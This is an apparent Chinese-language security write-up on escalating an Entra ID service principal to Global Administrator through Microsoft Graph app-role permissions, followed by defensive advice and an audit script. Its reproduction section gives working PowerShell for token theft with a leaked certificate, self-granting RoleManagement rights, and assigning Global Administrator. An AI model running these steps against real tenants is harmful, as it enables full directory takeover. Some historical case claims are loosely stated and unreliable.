Graph权限滥用：从服务主体到全局管理员的权限升级技术解析

2026-04-23 11:19:41作者：滑思眉Philip

漏洞原理：Graph API权限的设计缺陷与风险

核心权限解析：AppRoleAssignment.ReadWrite.All的危险性

Microsoft Graph API的AppRoleAssignment.ReadWrite.All权限设计初衷是允许服务主体管理应用角色分配，但在缺乏严格边界控制的情况下，这一权限成为横向与纵向权限提升的关键跳板。该权限允许服务主体修改其他服务主体的权限配置，包括为自身授予更高权限的能力，形成典型的"权限自赋"漏洞场景。

[!WARNING] 此权限默认不应分配给任何非核心基础设施服务主体，在Entra ID管理控制台中属于"高风险"权限类别，需通过PIM（特权身份管理）进行严格控制。

服务主体与用户主体的权限边界混淆

在Entra ID环境中，服务主体（Service Principal）与用户主体（User Principal）的权限控制逻辑存在差异。服务主体通常用于应用程序身份验证，其权限配置往往缺乏与用户主体相同级别的审计与监控。场景2中"Corporate Finance Analytics"服务主体正是利用这一特性，通过Graph API操作实现了传统用户权限控制之外的权限突破。

攻击复现：从证书泄露到完全接管的实战步骤

初始访问：证书凭证的获取与利用

🔴 高风险操作：通过泄露的PFX证书获取服务主体访问令牌

# 使用泄露证书获取访问令牌
$certPath = "C:\temp\leaked-cert.pfx"
$password = ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($certPath, $password)
$tenantId = "your-tenant-id"
$clientId = "service-principal-client-id"

# 获取Graph API访问令牌
$token = Get-MsalToken -ClientId $clientId -TenantId $tenantId -Certificate $cert -Scopes "https://graph.microsoft.com/.default"

权限提升链构建：从AppRoleAssignment到RoleManagement

🟡 中风险操作：利用现有权限为自身授予更高权限

# 使用Graph API为服务主体分配RoleManagement.ReadWrite.Directory权限
$graphUri = "https://graph.microsoft.com/v1.0/servicePrincipals/$clientId/appRoleAssignments"
$body = @{
    principalId = $clientId
    resourceId = "00000003-0000-0000-c000-000000000000" # Microsoft Graph资源ID
    appRoleId = "9e3f62cf-ca93-4989-b6ce-2c23647c5a48" # RoleManagement.ReadWrite.Directory权限ID
} | ConvertTo-Json

Invoke-RestMethod -Uri $graphUri -Headers @{Authorization = "Bearer $($token.AccessToken)"} -Method Post -Body $body -ContentType "application/json"

[!TIP] 权限分配后需断开当前会话并重新认证以刷新令牌。可通过Disconnect-MgGraph和Connect-MgGraph -AccessToken $newToken命令实现权限更新。

终极权限获取：全局管理员角色的直接分配

🔴 高风险操作：利用RoleManagement权限分配全局管理员角色

# 获取全局管理员角色模板ID
$roleTemplateId = (Get-MgDirectoryRole | Where-Object {$_.DisplayName -eq "Global Administrator"}).RoleTemplateId

# 为当前服务主体分配全局管理员角色
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $roleTemplateId -BodyParameter @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$clientId"
}

防御矩阵：多维度防御策略与最佳实践

云环境防御：权限最小化与监控体系构建

权限名称	风险等级	防御建议
AppRoleAssignment.ReadWrite.All	🔴 高	严格限制使用，配合PIM临时授权
RoleManagement.ReadWrite.Directory	🔴 高	启用审批工作流，实施Just-In-Time访问
Application.ReadWrite.All	🟡 中	定期审计应用注册与权限变更
User.ReadWrite.All	🟡 中	启用用户行为异常检测

在纯云环境中，建议部署Entra ID PIM（特权身份管理）并配置以下防护措施：

为所有高权限服务主体启用"永久禁用"状态，仅在需要时临时激活
配置权限分配的多因素认证要求
启用Graph API操作的详细审计日志，重点监控appRoleAssignments端点的调用

混合环境防御：跨边界权限控制

混合环境中需额外关注本地AD与Entra ID的同步机制：

实施AD Connect的权限筛选，避免高权限本地账户同步至云端
部署云应用安全代理(CASB)监控跨环境Graph API调用
建立本地与云端权限审计的统一视图，定期比对权限一致性

[!WARNING] 混合环境中常见"权限影子"现象——本地权限变更未同步至云端审计系统，导致权限滥用行为长期未被发现。

实战案例扩展：历史漏洞的相似利用手法

SolarWinds攻击事件：攻击者利用被盗的服务主体证书，通过Graph API枚举并导出全局地址列表，实现目标定位
2021年微软Exchange Online攻击：利用Application.ReadWrite.All权限修改邮件流规则，实现邮件窃听
2023年M365租户接管案例：通过AppRoleAssignment权限为恶意应用授予User.ReadWrite.All，重置管理员账户密码

这些案例均表明，Graph API权限滥用已成为针对Entra ID环境的主要攻击向量，需通过持续监控与最小权限原则构建纵深防御体系。

权限配置审计自动化实现

# 服务主体高风险权限审计脚本
$highRiskPermissions = @(
    "AppRoleAssignment.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "Application.ReadWrite.All"
)

# 获取所有服务主体及其权限
Get-MgServicePrincipal | ForEach-Object {
    $sp = $_
    Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $sp.Id | ForEach-Object {
        $appRole = Get-MgServicePrincipalAppRole -ServicePrincipalId $_.ResourceId | Where-Object {$_.Id -eq $_.AppRoleId}
        if ($highRiskPermissions -contains $appRole.Value) {
            [PSCustomObject]@{
                ServicePrincipal = $sp.DisplayName
                Permission = $appRole.Value
                AssignedDate = $_.CreatedDateTime
                RiskLevel = "High"
            }
        }
    }
} | Export-Csv -Path "EntraID_Permission_Audit.csv" -NoTypeInformation